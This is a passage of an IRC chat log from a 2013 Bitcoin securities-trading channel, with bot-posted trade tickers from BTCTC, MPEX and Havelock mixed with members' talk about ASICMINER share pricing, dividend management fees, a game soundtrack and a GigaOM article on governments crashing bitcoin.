Jul 16 16:13:45 mircea_popescu, "i wasn't understanding wtf got into the matthew_boyd kid" -- What? :P Jul 16 16:14:23 ofc Jul 16 16:14:48 [BTCTC] [TAT.ASICMINER] 25 @ 0.04151 = 1.0378 BTC [-] Jul 16 16:14:56 "How to invest your extra lunch money" would be a good start Jul 16 16:15:24 [BTCTC] [ASICMINER-PT] 3 @ 4.45 = 13.35 BTC [+] Jul 16 16:15:40 [BTCTC] [TAT.ASICMINER] 87 @ 0.04151 = 3.6114 BTC [-] Jul 16 16:15:52 I will invest my 0.0001 in your HFT fund Jul 16 16:16:04 "for kids" would be nice Jul 16 16:16:14 [BTCTC] [COGNITIVE] 3 @ 0.91999 = 2.76 BTC [+] Jul 16 16:16:17 lots of lunch money to invest there Jul 16 16:17:03 rly, i had some thoughts about demo coinbr accounts with virtual bitcoins... Jul 16 16:17:14 but could not figure out how to match them against real mpex market Jul 16 16:17:30 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.003821 = 0.0344 BTC [-] Jul 16 16:18:35 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.00382 = 0.0153 BTC [-] Jul 16 16:19:00 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.00382 = 0.0306 BTC [-] Jul 16 16:19:42 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00382 = 0.0076 BTC [-] Jul 16 16:19:56 [BTCTC] [COGNITIVE] 1 @ 0.91999 BTC [+] Jul 16 16:20:25 [MPEX] [S.MPOE] 1966 @ 0.00092368 = 1.816 BTC [+] Jul 16 16:20:31 oh, and isn't there /r/bitcoinstocks already? Jul 16 16:20:38 yeah Jul 16 16:20:43 but rarely updated Jul 16 16:21:32 i guess i have enough such enjoyment Jul 16 16:21:44 [BTCTC] [ASICMINER-PT] 1 @ 4.400001 BTC [-] Jul 16 16:22:11 [BTCTC] [COGNITIVE] 2 @ 0.91999 = 1.84 BTC [+] Jul 16 16:22:23 but if you must, i suggest to bribe ukto or burnside or parseval to include the chan as a trollbox Jul 16 16:22:26 [BTCTC] [COGNITIVE] 4 @ 0.91999 = 3.68 BTC [+] Jul 16 16:22:28 [BTCTC] [ASICMINER-PT] 1 @ 4.45 BTC [+] Jul 16 16:22:34 Damn why is the tat-am so much lower than the am-pt :| Jul 16 16:23:25 [BTCTC] [TAT.ASICMINER] 16 @ 0.042097 = 0.6736 BTC [+] Jul 16 16:24:07 [BTCTC] [TAT.ASICMINER] 126 @ 0.042097 = 5.3042 BTC [+] Jul 16 16:24:09 [BTCTC] [TAT.ASICMINER] 50 @ 0.042098 = 2.1049 BTC [+] Jul 16 16:24:11 [BTCTC] [TAT.ASICMINER] 124 @ 0.0421 = 5.2204 BTC [+] Jul 16 16:27:08 makes me want to sell the PTs for TATs… though my objective was the reverse Jul 16 16:27:34 "Our hashrate after the BFL units are delivered (soon): 573 gh/s" <<< epic. Jul 16 16:27:53 i have logs from like septemer saying the same thing Jul 16 16:27:57 not the same people obviously. Jul 16 16:29:01 [BTCTC] [AMC-PT] 1 @ 0.002498 BTC [-] Jul 16 16:29:09 Rulother: actually on btct it's not that lower if you account for the 5% fee on dividends Jul 16 16:32:52 https://bitcointalk.org/index.php?topic=257279.0 Jul 16 16:32:57 selling used worn boxers Jul 16 16:33:28 [BTCTC] [ASICMINER-PT] 1 @ 4.453999 BTC [+] Jul 16 16:33:30 [BTCTC] [ASICMINER-PT] 7 @ 4.454 = 31.178 BTC [+] Jul 16 16:33:56 [BTCTC] [ASICMINER-PT] 1 @ 4.4539 BTC [-] Jul 16 16:34:15 [BTCTC] [ASICMINER-PT] 1 @ 4.454 BTC [+] Jul 16 16:34:34 [BTCTC] [COGNITIVE] 1 @ 0.9 BTC [-] Jul 16 16:34:58 [BTCTC] [TAT.ASICMINER] 5 @ 0.042099 = 0.2105 BTC [-] Jul 16 16:35:19 [BTCTC] [ASICMINER-PT] 2 @ 4.4548 = 8.9096 BTC [+] Jul 16 16:36:03 [BTCTC] [ASICMINER-PT] 1 @ 4.454868 BTC [+] Jul 16 16:36:18 [BTCTC] [ASICMINER-PT] 1 @ 4.467 BTC [+] Jul 16 16:36:19 [BTCTC] [ASICMINER-PT] 1 @ 4.479888 BTC [+] Jul 16 16:36:27 [BTCTC] [ASICMINER-PT] 5 @ 4.4799 = 22.3995 BTC [+] Jul 16 16:36:38 [BTCTC] [COGNITIVE] 1 @ 0.9 BTC [-] Jul 16 16:36:40 [BTCTC] [ASICMINER-PT] 5 @ 4.4799 = 22.3995 BTC [+] Jul 16 16:37:41 [BTCTC] [ASICMINER-PT] 1 @ 4.48 BTC [+] Jul 16 16:37:52 [BTCTC] [ASICMINER-PT] 4 @ 4.48 = 17.92 BTC [+] Jul 16 16:37:54 [BTCTC] [ASICMINER-PT] 1 @ 4.48 BTC [+] Jul 16 16:38:00 [BTCTC] [ASICMINER-PT] 1 @ 4.48 BTC [+] Jul 16 16:38:14 [BTCTC] [ASICMINER-PT] 1 @ 4.488 BTC [+] Jul 16 16:38:16 [BTCTC] [ASICMINER-PT] 1 @ 4.4888 BTC [+] Jul 16 16:38:37 [BTCTC] [TAT.ASICMINER] 17 @ 0.042099 = 0.7157 BTC [-] Jul 16 16:38:40 [BTCTC] [TAT.ASICMINER] 103 @ 0.0421 = 4.3363 BTC [+] Jul 16 16:40:07 mircea_popescu: "soon" is already trademarked, dunno how they expect to get away using it carelessly like that Jul 16 16:40:12 http://www.wowwiki.com/Soon Jul 16 16:40:15 Soon - WoWWiki - Your guide to the World of Warcraft Jul 16 16:40:23 [BTCTC] [BASIC-MINING] 5 @ 0.633991 = 3.17 BTC [+] Jul 16 16:40:48 [BTCTC] [ASICMINER-PT] 1 @ 4.488 BTC [-] Jul 16 16:40:55 [BTCTC] [ASICMINER-PT] 13 @ 4.489 = 58.357 BTC [+] Jul 16 16:41:10 srsly. Jul 16 16:41:56 That's impressive, didn't know that! Jul 16 16:42:08 [BTCTC] [AMC-PT] 78 @ 0.002498 = 0.1948 BTC [-] Jul 16 16:42:26 I think reading "BFL" and "soon" in the same line always kills some neurons Jul 16 16:43:12 [BTCTC] [TAT.ASICMINER] 169 @ 0.041517 = 7.0164 BTC [-] Jul 16 16:44:56 [BTCTC] [TAT.ASICMINER] 7 @ 0.0421 = 0.2947 BTC [+] Jul 16 16:45:14 too much spikes Jul 16 16:45:28 [BTCTC] [TAT.ASICMINER] 10 @ 0.042199 = 0.422 BTC [+] Jul 16 16:45:30 [BTCTC] [TAT.ASICMINER] 4 @ 0.0422 = 0.1688 BTC [+] Jul 16 16:45:32 [BTCTC] [TAT.ASICMINER] 16 @ 0.0422 = 0.6752 BTC [+] Jul 16 16:45:33 [BTCTC] [TAT.ASICMINER] 6 @ 0.042379 = 0.2543 BTC [+] Jul 16 16:45:35 [BTCTC] [TAT.ASICMINER] 4 @ 0.04238 = 0.1695 BTC [+] Jul 16 16:45:36 [BTCTC] [TAT.ASICMINER] 9 @ 0.0424 = 0.3816 BTC [+] Jul 16 16:45:38 [BTCTC] [TAT.ASICMINER] 51 @ 0.042498 = 2.1674 BTC [+] Jul 16 16:45:52 [BTCTC] [ASICMINER-PT] 4 @ 4.421 = 17.684 BTC [-] Jul 16 16:47:32 [BTCTC] [ASICMINER-PT] 4 @ 4.421 = 17.684 BTC [-] Jul 16 16:47:34 [BTCTC] [ASICMINER-PT] 5 @ 4.42 = 22.1 BTC [-] Jul 16 16:48:42 [MPEX] [S.MPOE] 5600 @ 0.00092368 = 5.1726 BTC [+] Jul 16 16:48:44 [BTCTC] [ASICMINER-PT] 1 @ 4.488 BTC [+] Jul 16 16:49:08 [BTCTC] [ASICMINER-PT] 1 @ 4.488 BTC [+] Jul 16 16:49:17 [BTCTC] [TAT.ASICMINER] 2 @ 0.042498 = 0.085 BTC [+] Jul 16 16:49:21 [BTCTC] [DMS.PURCHASE] 5 @ 0.040033 = 0.2002 BTC [+] Jul 16 16:49:52 folks Jul 16 16:49:59 nubbins Jul 16 16:51:00 [BTCTC] [TAT.ASICMINER] 38 @ 0.042498 = 1.6149 BTC [+] Jul 16 16:51:32 [BTCTC] [ASICMINER-PT] 1 @ 4.421 BTC [-] Jul 16 16:53:37 [BTCTC] [ASICMINER-PT] 1 @ 4.421 BTC [-] Jul 16 16:53:53 sigh Jul 16 16:54:23 Well I guess it's a good thing I convinced myself I was just throwing away money when I made my purchase lol Jul 16 16:55:36 [BTCTC] [AMC-PT] 1302 @ 0.002498 = 3.2524 BTC [-] Jul 16 16:56:19 [BTCTC] [ASICMINER-PT] 1 @ 4.421 BTC [-] Jul 16 16:56:42 [BTCTC] [AMC-PT] 2 @ 0.002498 = 0.005 BTC [-] Jul 16 16:57:38 [BTCTC] [AMC-PT] 17 @ 0.002498 = 0.0425 BTC [-] Jul 16 16:57:49 [BTCTC] [ASICMINER-PT] 4 @ 4.48699 = 17.948 BTC [+] Jul 16 16:59:19 [MPEX] [S.MPOE] 11713 @ 0.00092368 = 10.8191 BTC [+] Jul 16 17:00:12 [BTCTC] [DMS.PURCHASE] 10 @ 0.040033 = 0.4003 BTC [+] Jul 16 17:01:40 [BTCTC] [AMC-PT] 1 @ 0.002498 BTC [-] Jul 16 17:02:52 [BTCTC] [COGNITIVE] 1 @ 0.88 BTC [-] Jul 16 17:05:08 [09:29] Rulother: actually on btct it's not that lower if you account for the 5% fee on dividends <<< Yes, but note that 5% of dividends is something much different than 5% of price Jul 16 17:05:29 [BTCTC] [DMS.MINING] 1 @ 0.0157 BTC [-] Jul 16 17:06:33 yes yes but sometimes it's a bit more than 5% Jul 16 17:06:56 It just comes down to the demand Jul 16 17:06:58 [BTCTC] [PAJKA.BOND] 8 @ 0.029999 = 0.24 BTC [-] Jul 16 17:07:00 [BTCTC] [PAJKA.BOND] 36 @ 0.03 = 1.08 BTC [+] Jul 16 17:07:34 Not what I meant Jul 16 17:07:55 [BTCTC] [AMC-PT] 40 @ 0.002498 = 0.0999 BTC [-] Jul 16 17:08:21 the 5% of dividend mgmt fee should not be thought of as a 5% less valuable stock outright Jul 16 17:08:35 the math doesn't work like that Jul 16 17:08:35 Gotcha Jul 16 17:09:06 for example. Jul 16 17:09:22 if the dividend is .02 per week for 2 months Jul 16 17:09:37 the mgmt fee is 0.00866 Jul 16 17:09:53 Right right and I got that Jul 16 17:10:04 kk Jul 16 17:10:39 I was just saying there was a big difference in the price for TAT vs pt, when I said that, TAT was 4.17 and pt was 4.42 Jul 16 17:10:47 yeah Jul 16 17:11:04 depending on if you're buy/selling it could be good for ya Jul 16 17:11:23 I'm just saying it's worth thinking about how long you plan to hold the stock, to help determine which one to buy Jul 16 17:11:31 and run the projected div fees Jul 16 17:12:01 True, but for someone like whose buying and selling them over and over again everyday, Divs are not a big deal Jul 16 17:13:10 well AM divs vary, and only have like 5mos of history, and future share price is pretty hard to predict Jul 16 17:13:33 generally I think people treat the 5% mgmt fee too strongly Jul 16 17:13:46 I do try to get in for divs on Wednesday, but its a gamble for when people sell off their shares and drop the price of am Jul 16 17:14:03 so that shows you are a trader Jul 16 17:14:12 [BTCTC] [ASICMINER-PT] 1 @ 4.459 BTC [-] Jul 16 17:14:15 and thus should not factor the mgmt fee much Jul 16 17:14:31 O I really don't and I think it's reasonable either way Jul 16 17:14:57 if you are trying to get as many AM for as long as possible, the whole-shares are usually the best bet Jul 16 17:15:14 interesting - I di dn't factor it that way but it turns out I'm already doing it right :p Jul 16 17:17:17 of course people may be using other factors too Jul 16 17:17:18 [BTCTC] [BASIC-MINING] 2 @ 0.633999 = 1.268 BTC [+] Jul 16 17:17:29 like TAT.AM can't be exported Jul 16 17:17:30 [BTCTC] [BASIC-MINING] 1 @ 0.634 BTC [+] Jul 16 17:17:42 [BTCTC] [BASIC-MINING] 7 @ 0.6341 = 4.4387 BTC [+] Jul 16 17:17:46 and people may find me to be higher risk than Burnside Jul 16 17:17:51 [BTCTC] [BASIC-MINING] 8 @ 0.634998 = 5.08 BTC [+] Jul 16 17:18:17 [BTCTC] [BASIC-MINING] 1 @ 0.635 BTC [+] Jul 16 17:18:30 [BTCTC] [BASIC-MINING] 8 @ 0.639 = 5.112 BTC [+] Jul 16 17:18:45 [BTCTC] [BASIC-MINING] 6 @ 0.6395 = 3.837 BTC [+] Jul 16 17:18:57 [BTCTC] [BASIC-MINING] 40 @ 0.64 = 25.6 BTC [+] Jul 16 17:19:08 [BTCTC] [BASIC-MINING] 5 @ 0.65 = 3.25 BTC [+] Jul 16 17:19:32 [BTCTC] [COGNITIVE] 1 @ 0.87 BTC [-] Jul 16 17:20:26 [BTCTC] [LTC-ATF.B2] 5 @ 0.01006 = 0.0503 BTC [-] Jul 16 17:20:49 [BTCTC] [BASIC-MINING] 8 @ 0.674 = 5.392 BTC [+] Jul 16 17:20:50 [BTCTC] [BASIC-MINING] 19 @ 0.674996 = 12.8249 BTC [+] Jul 16 17:21:07 [BTCTC] [S.MPOE-PT] 1 @ 0.00082 BTC [-] Jul 16 17:21:31 [HAVELOCK] [SDSTM] 819 @ 0.01089 = 8.9189 BTC [+] Jul 16 17:22:37 [BTCTC] [AMC-PT] 102 @ 0.002498 = 0.2548 BTC [-] Jul 16 17:23:34 http://trilema.com/2013/15th-blown-other-statements/ Jul 16 17:23:38 15th blown, other statements. pe Trilema - Un blog de Mircea Popescu. Jul 16 17:24:25 [BTCTC] [AMC-PT] 25 @ 0.002498 = 0.0625 BTC [-] Jul 16 17:25:05 so, in two weeks Jul 16 17:26:11 always. Jul 16 17:27:30 I'm going to wait til freaking Sept Jul 16 17:27:39 I'm not* Jul 16 17:27:44 [BTCTC] [ASICMINER-PT] 5 @ 4.422006 = 22.11 BTC [-] Jul 16 17:28:27 [BTCTC] [COGNITIVE] 4 @ 0.888 = 3.552 BTC [+] Jul 16 17:28:29 [BTCTC] [COGNITIVE] 7 @ 0.888788 = 6.2215 BTC [+] Jul 16 17:28:30 [BTCTC] [COGNITIVE] 8 @ 0.8888 = 7.1104 BTC [+] Jul 16 17:28:32 [BTCTC] [COGNITIVE] 5 @ 0.888888 = 4.4444 BTC [+] Jul 16 17:28:43 i can't play the ogg :( Jul 16 17:29:01 vlc ? Jul 16 17:30:14 hey mircea_popescu any chance you can push my withdraw request please? Jul 16 17:30:26 sure. Jul 16 17:30:36 nothing is left to chance! Jul 16 17:30:47 heh Jul 16 17:31:16 vlc worked Jul 16 17:31:27 i thought chrome supported ogg? Jul 16 17:32:39 AFAIK it does Jul 16 17:32:54 it does till you try it. Jul 16 17:33:06 [MPEX] [S.MPOE] 15721 @ 0.00092368 = 14.5212 BTC [+] Jul 16 17:33:31 ThickAsThieves so what did you think ? Jul 16 17:34:43 it's cute, but the actual recording needs work Jul 16 17:35:01 room noise, so-so mic I'm guessing Jul 16 17:35:06 [HAVELOCK] [SDSTM] 2 @ 0.0108999 = 0.0218 BTC [+] Jul 16 17:35:49 yeah. i'm not springing for studio time. Jul 16 17:36:17 [BTCTC] [AMC-PT] 222 @ 0.002498 = 0.5546 BTC [-] Jul 16 17:36:21 not too expensive to set something decent up Jul 16 17:36:24 for voicework Jul 16 17:36:35 but this means having people come to you Jul 16 17:36:41 or sending equipment around the world Jul 16 17:36:42 etc Jul 16 17:36:44 yeah. not very practical. Jul 16 17:36:55 [HAVELOCK] [SDICE] 5 @ 0.207 = 1.035 BTC [+] Jul 16 17:36:56 [HAVELOCK] [SDICE] 20 @ 0.20899999 = 4.18 BTC [+] Jul 16 17:36:58 [HAVELOCK] [SDICE] 10 @ 0.209 = 2.09 BTC [+] Jul 16 17:36:59 [HAVELOCK] [SDICE] 2 @ 0.215 = 0.43 BTC [+] Jul 16 17:37:00 [HAVELOCK] [SDICE] 10 @ 0.219 = 2.19 BTC [+] Jul 16 17:37:00 [HAVELOCK] [SDICE] 10 @ 0.21998 = 2.1998 BTC [+] Jul 16 17:37:01 [HAVELOCK] [SDICE] 2 @ 0.219999 = 0.44 BTC [+] Jul 16 17:37:03 [HAVELOCK] [SDICE] 10 @ 0.2199999 = 2.2 BTC [+] Jul 16 17:37:04 [HAVELOCK] [SDICE] 43 @ 0.22 = 9.46 BTC [+] Jul 16 17:37:05 [HAVELOCK] [SDICE] 10 @ 0.22 = 2.2 BTC [+] Jul 16 17:37:06 [HAVELOCK] [SDICE] 10 @ 0.23 = 2.3 BTC [+] Jul 16 17:37:07 [HAVELOCK] [SDICE] 443 @ 0.2399 = 106.2757 BTC [+] Jul 16 17:37:08 [HAVELOCK] [SDICE] 1236 @ 0.2399 = 296.5164 BTC [+] Jul 16 17:37:09 welp Jul 16 17:37:17 damn havelock Jul 16 17:37:20 go the route of banjo kazooie Jul 16 17:37:29 I guess I'll send money over to havelock now Jul 16 17:38:17 [BTCTC] [DMS.SELLING] 10 @ 0.023125 = 0.2313 BTC [-] Jul 16 17:38:19 [BTCTC] [DMS.SELLING] 100 @ 0.02312 = 2.312 BTC [-] Jul 16 17:39:55 [BTCTC] [COGNITIVE] 3 @ 0.888888 = 2.6667 BTC [+] Jul 16 17:39:56 [BTCTC] [COGNITIVE] 11 @ 0.888889 = 9.7778 BTC [+] Jul 16 17:40:35 [BTCTC] [BFMINES] 250 @ 0.00399 = 0.9975 BTC [+] Jul 16 17:40:54 what do you guys think cog will peak at? Jul 16 17:40:58 [BTCTC] [DMS.SELLING] 1 @ 0.02311 BTC [-] Jul 16 17:41:00 [BTCTC] [DMS.SELLING] 74 @ 0.0231 = 1.7094 BTC [-] Jul 16 17:41:28 [BTCTC] [COGNITIVE] 2 @ 0.888888 = 1.7778 BTC [-] Jul 16 17:41:30 [BTCTC] [COGNITIVE] 7 @ 0.888889 = 6.2222 BTC [+] Jul 16 17:42:04 so mircea_popescu what will you be springing forth? Jul 16 17:42:44 hm ? Jul 16 17:42:46 "According to the Daily Treasury Statement for July 12, which the U.S. Treasury released this afternoon, the federal debt that is currently subject to a legal limit of $16,699,421,095,673.60 has stood at exactly $16,699,396,000,000.00 for 56 straight days. " Jul 16 17:43:12 [HAVELOCK] [AM100] 17 @ 0.041 = 0.697 BTC [+] Jul 16 17:43:44 what exactly is the threshold between "what I will spend/what I won't spend" Jul 16 17:44:00 tbe. Jul 16 17:44:07 "yeah. i'm not springing for studio time." Jul 16 17:44:12 [BTCTC] [COGNITIVE] 1 @ 0.888889 BTC [+] Jul 16 17:44:51 http://dfw.cbslocal.com/2013/07/15/city-council-to-address-nudity-claim-at-local-breastaurant/ Jul 16 17:46:29 [BTCTC] [ASICMINER-PT] 3 @ 4.423 = 13.269 BTC [+] Jul 16 17:46:31 The foley artists kinda need a studio for sound effects unless you're going to use chiptunes... Jul 16 17:47:00 and most foley artists you know, come with a studio most of the time since they have a mini-one in their home... Jul 16 17:47:11 http://oldforums.eveonline.com/?a=topic&threadID=1572762&page=1 Jul 16 17:47:12 [BTCTC] [BTC-BOND] 10 @ 0.009956 = 0.0996 BTC [-] Jul 16 17:47:15 that threa'ds pretty lulzy Jul 16 17:47:15 EVE Online | EVE Insider | Forums Jul 16 17:47:39 thestringpuller im not concerned with any of that nonsense and poppycock. i'm making a game. Jul 16 17:48:44 oh mircea_popescu Jul 16 17:48:54 [BTCTC] [ASICMINER-PT] 4 @ 4.46 = 17.84 BTC [+] Jul 16 17:49:44 so there won't be any sound? Jul 16 17:50:06 fitting since it's more appealing to just turn off the sound of the game and blast vampire weekend Jul 16 17:50:17 (for an MMO that is) Jul 16 17:50:19 okay that's good enough. Jul 16 17:50:26 [BTCTC] [BASIC-MINING] 3 @ 0.674899 = 2.0247 BTC [-] Jul 16 17:50:33 one needs a particular sort of retard hat to go from here's an ogg to there won't be sound. Jul 16 17:50:38 thestringpuller!*@* added to ignore list. Jul 16 17:50:40 [BTCTC] [BASIC-MINING] 4 @ 0.6749 = 2.6996 BTC [+] Jul 16 17:51:00 [BTCTC] [COGNITIVE] 1 @ 0.888889 BTC [+] Jul 16 17:51:10 [BTCTC] [BASIC-MINING] 3 @ 0.674998 = 2.025 BTC [+] Jul 16 17:51:12 [BTCTC] [ASICMINER-PT] 2 @ 4.482 = 8.964 BTC [+] Jul 16 17:51:26 lol Jul 16 17:51:56 [BTCTC] [COGNITIVE] 5 @ 0.888889 = 4.4444 BTC [+] Jul 16 17:52:15 [BTCTC] [COGNITIVE] 2 @ 0.914999 = 1.83 BTC [+] Jul 16 17:52:45 [HAVELOCK] [HIM] 2 @ 0.29998999 = 0.6 BTC [+] Jul 16 17:55:12 Use Siri Jul 16 17:55:38 [HAVELOCK] [SDSTM] 1206 @ 0.01089 = 13.1333 BTC [-] Jul 16 17:56:25 [BTCTC] [TAT.ASICMINER] 16 @ 0.042499 = 0.68 BTC [+] Jul 16 17:56:27 [HAVELOCK] [AM100] 2 @ 0.0404 = 0.0808 BTC [-] Jul 16 17:56:29 [BTCTC] [TAT.ASICMINER] 10 @ 0.042498 = 0.425 BTC [-] Jul 16 17:56:41 mircea_popescu: thanks Jul 16 17:56:43 [BTCTC] [COGNITIVE] 3 @ 0.914999 = 2.745 BTC [+] Jul 16 17:56:46 got the withdraw Jul 16 17:56:56 [HAVELOCK] [AM100] 75 @ 0.040255 = 3.0191 BTC [-] Jul 16 17:57:42 [BTCTC] [COGNITIVE] 22 @ 0.915 = 20.13 BTC [+] Jul 16 17:58:23 [HAVELOCK] [AM100] 100 @ 0.041189 = 4.1189 BTC [+] Jul 16 17:58:24 [BTCTC] [ASICMINER-PT] 2 @ 4.485978 = 8.972 BTC [+] Jul 16 17:58:28 [BTCTC] [AMC-PT] 1 @ 0.002495 BTC [-] Jul 16 17:58:40 [BTCTC] [S.DICE-PT] 188 @ 0.002357 = 0.4431 BTC [+] Jul 16 17:59:13 [HAVELOCK] [SDSTM] 26 @ 0.0108999 = 0.2834 BTC [+] Jul 16 18:01:18 [HAVELOCK] [SDSTM] 21 @ 0.0108999 = 0.2289 BTC [+] Jul 16 18:01:28 [BTCTC] [AMC-PT] 417 @ 0.002498 = 1.0417 BTC [+] Jul 16 18:02:57 mircea_popescu, have you considered updating http://trilema.com/2013/for-lack-of-a-nail/ ? Jul 16 18:03:49 i mean the part of taking a day off and then changing his mind about taking the loss out of his pocket, and your comments on that Jul 16 18:08:02 http://gigaom.com/2013/07/13/bitcoin-will-prosper-until-governments-or-banks-decide-to-crush-it-overnight/ Jul 16 18:08:05 Bitcoin will prosper — until governments or banks decide to crush it overnight — Tech News Jul 16 18:08:22 "And, in the case of Bitcoin, it would be utterly simple to do because the total value of all Bitcoins, currently about $1 billion, is so minuscule compared to the buying power of any industrialized country. Jul 16 18:08:22 This would remain the case if Bitcoin’s market cap increased 100-fold or even 1000-fold. The algorithm is simple: gradually purchase large sums of Bitcoins, a hundred million dollars worth given the current market cap would be plenty. Then flash sell them to flood the market and drive the price down. Rinse, repeat." Jul 16 18:09:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.0425 BTC [+] Jul 16 18:09:25 [BTCTC] [PAJKA.BOND] 9 @ 0.032499 = 0.2925 BTC [+] Jul 16 18:09:27 that would only give more fiat money to bitcoiners Jul 16 18:09:35 it's absurd Jul 16 18:09:50 I *hope* they actually do it Jul 16 18:10:13 [BTCTC] [TAT.ASICMINER] 3 @ 0.042589 = 0.1278 BTC [+] Jul 16 18:10:48 of course it's hurting confidence - as they mention in the article Jul 16 18:11:00 [BTCTC] [TAT.ASICMINER] 59 @ 0.042589 = 2.5128 BTC [+] Jul 16 18:11:02 [BTCTC] [TAT.ASICMINER] 71 @ 0.04259 = 3.0239 BTC [+] Jul 16 18:11:37 it would also draw more attention to it Jul 16 18:12:20 [BTCTC] [AMC-PT] 7990 @ 0.002498 = 19.959 BTC [+] Jul 16 18:12:38 how does that work too "Boss, can we budget $500m to fuck around with bitcoin?" Jul 16 18:12:47 [BTCTC] [TAT.ASICMINER] 5 @ 0.04259 = 0.213 BTC [+] Jul 16 18:13:38 sure, for now it's absurd. no bank is going to do that Jul 16 18:13:39 I'm sure banks can do it as a collective Jul 16 18:13:42 [BTCTC] [DMS.PURCHASE] 24 @ 0.040033 = 0.9608 BTC [+] Jul 16 18:14:03 "it’s bad for the economy at large if money holds or increases in value, because then everybody starts saving all their money and nobody buys much of anything" ugh… Jul 16 18:14:19 hehe Jul 16 18:14:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.04259 BTC [+] Jul 16 18:14:54 i wonder how valuable money would have to get for everyone to just freeze in place and die? Jul 16 18:15:32 [BTCTC] [ASICMINER-PT] 2 @ 4.424001 = 8.848 BTC [-] Jul 16 18:15:34 [BTCTC] [TAT.ASICMINER] 10 @ 0.042498 = 0.425 BTC [-] Jul 16 18:15:36 [BTCTC] [ASICMINER-PT] 1 @ 4.424 BTC [-] Jul 16 18:15:38 [BTCTC] [ASICMINER-PT] 1 @ 4.42345 BTC [-] Jul 16 18:15:40 [BTCTC] [ASICMINER-PT] 2 @ 4.422005 = 8.844 BTC [-] Jul 16 18:16:10 [BTCTC] [TAT.ASICMINER] 30 @ 0.042498 = 1.2749 BTC [-] Jul 16 18:16:25 no more than $1.10 per $, i'm sure Jul 16 18:16:25 [HAVELOCK] [AM100] 85 @ 0.040254 = 3.4216 BTC [-] Jul 16 18:17:09 [BTCTC] [TAT.ASICMINER] 4 @ 0.04259 = 0.1704 BTC [+] Jul 16 18:17:30 $1.10 per $? Jul 16 18:17:40 [BTCTC] [ASICMINER-PT] 1 @ 4.484 BTC [+] Jul 16 18:18:03 [BTCTC] [TAT.ASICMINER] 2 @ 0.042498 = 0.085 BTC [-] Jul 16 18:18:34 [BTCTC] [COGNITIVE] 1 @ 0.871001 BTC [-] Jul 16 18:18:36 [BTCTC] [COGNITIVE] 11 @ 0.871 = 9.581 BTC [-] Jul 16 18:18:46 [BTCTC] [ASICMINER-PT] 1 @ 4.421 BTC [-] Jul 16 18:18:53 excellent Jul 16 18:19:12 wouldn't YOU stop spending if that was the case? Jul 16 18:19:49 it would never be the case Jul 16 18:19:53 $ = $ Jul 16 18:20:00 [BTCTC] [PAJKA.BOND] 1 @ 0.0325 BTC [+] Jul 16 18:20:12 that's the joke, yeah ;( Jul 16 18:20:12 he meant a 10% increase Jul 16 18:20:43 like if they destroyed 10% of the dollars? Jul 16 18:20:45 more likely is they will use such scheme to try putting our mircea out of business, should he become a PITA. Jul 16 18:21:21 than to destroy bitcoin as a whole Jul 16 18:21:22 the bot will go offline myseriously I'm sure Jul 16 18:21:28 t Jul 16 18:22:31 but the option will be sold out by that time already Jul 16 18:22:41 *options Jul 16 18:23:07 i was kinda offering that up as an implausible scenario in which logic and math break down, but i guess my timing needs a bit of work Jul 16 18:23:14 [BTCTC] [ASICMINER-PT] 1 @ 4.48399 BTC [+] Jul 16 18:23:35 [BTCTC] [COGNITIVE] 1 @ 0.873 BTC [+] Jul 16 18:24:23 [HAVELOCK] [AM100] 3 @ 0.040301 = 0.1209 BTC [+] Jul 16 18:25:22 [HAVELOCK] [AM100] 44 @ 0.040501 = 1.782 BTC [+] Jul 16 18:25:42 both of these break down regularly at wall st Jul 16 18:25:53 *mjr_* so i had a question for you Jul 16 18:25:59 *mjr_* and this is all purely hypothetical Jul 16 18:26:12 *mjr_* are you available? Jul 16 18:26:14 [HAVELOCK] [AM100] 39 @ 0.040501 = 1.5795 BTC [+] Jul 16 18:27:23 [BTCTC] [TAT.ASICMINER] 39 @ 0.04259 = 1.661 BTC [+] Jul 16 18:27:25 [BTCTC] [TAT.ASICMINER] 50 @ 0.0426 = 2.13 BTC [+] Jul 16 18:27:27 [BTCTC] [TAT.ASICMINER] 74 @ 0.0426 = 3.1524 BTC [+] Jul 16 18:27:35 [BTCTC] [TAT.ASICMINER] 14 @ 0.04268 = 0.5975 BTC [+] Jul 16 18:28:03 [BTCTC] [TAT.ASICMINER] 30 @ 0.0416 = 1.248 BTC [-] Jul 16 18:28:05 [BTCTC] [TAT.ASICMINER] 80 @ 0.041528 = 3.3222 BTC [-] Jul 16 18:28:43 [BTCTC] [TAT.ASICMINER] 5 @ 0.04299 = 0.215 BTC [+] Jul 16 18:29:46 [BTCTC] [COGNITIVE] 1 @ 0.860001 BTC [-] Jul 16 18:30:19 [BTCTC] [ASICMINER-PT] 1 @ 4.45 BTC [-] Jul 16 18:30:40 [HAVELOCK] [AM100] 29 @ 0.040501 = 1.1745 BTC [+] Jul 16 18:30:48 [HAVELOCK] [AM100] 21 @ 0.040501 = 0.8505 BTC [+] Jul 16 18:30:53 [HAVELOCK] [AM100] 43 @ 0.040501 = 1.7415 BTC [+] Jul 16 18:31:16 [BTCTC] [AMC-PT] 500 @ 0.002498 = 1.249 BTC [+] Jul 16 18:32:07 particulary if you then expect to sell up and down Jul 16 18:32:23 [HAVELOCK] [AM100] 24 @ 0.040501 = 0.972 BTC [+] Jul 16 18:32:33 [HAVELOCK] [AM100] 2 @ 0.040501 = 0.081 BTC [+] Jul 16 18:32:35 [HAVELOCK] [AM100] 23 @ 0.040501 = 0.9315 BTC [+] Jul 16 18:32:54 [HAVELOCK] [AM100] 6 @ 0.040502 = 0.243 BTC [+] Jul 16 18:33:19 [BTCTC] [TAT.ASICMINER] 16 @ 0.042899 = 0.6864 BTC [-] Jul 16 18:33:48 so where's the S.MG panic sale? Jul 16 18:33:55 (more for me, hehe) Jul 16 18:35:40 Apocalyptic i've not really had time to follow that one, what's the news today ? Jul 16 18:36:00 well, he decided he wouldn't take the loss Jul 16 18:36:06 [BTCTC] [ASICMINER-PT] 1 @ 4.465 BTC [+] Jul 16 18:36:07 so he "rolled back" the bets Jul 16 18:36:10 [BTCTC] [ASICMINER-PT] 1 @ 4.479688 BTC [+] Jul 16 18:36:22 ThickAsThieves gigaom is remarkably fucking stupid. Jul 16 18:36:24 giving some investors/betters negative balance and other funny stuff Jul 16 18:36:30 indeed Jul 16 18:36:41 why do these people feel the urge to comment expertly on things they don't even vaguely 